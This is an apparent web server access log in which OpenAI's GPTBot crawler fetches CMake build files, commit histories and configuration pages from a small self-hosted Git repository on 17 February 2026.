"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21332] [Gzip 6.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11835] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11869] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14689] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10203] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10227] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31132] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31164] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10659] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10629] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10238] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10216] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11034] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11064] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14722] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10870] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build" -[17/Feb/2026:14:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/daily" [Client 74.7.227.38] [Length 8384] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" -[17/Feb/2026:14:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" -[17/Feb/2026:14:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 626314] [Gzip 15.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10851] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 11874] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:14:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10276] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" -[17/Feb/2026:14:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:14:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2f.gitignore" [Client 74.7.227.38] [Length 23318] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" -[17/Feb/2026:14:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:28:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:14:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/html/README.md" -[17/Feb/2026:14:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14154] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11140] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21331] [Gzip 6.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] 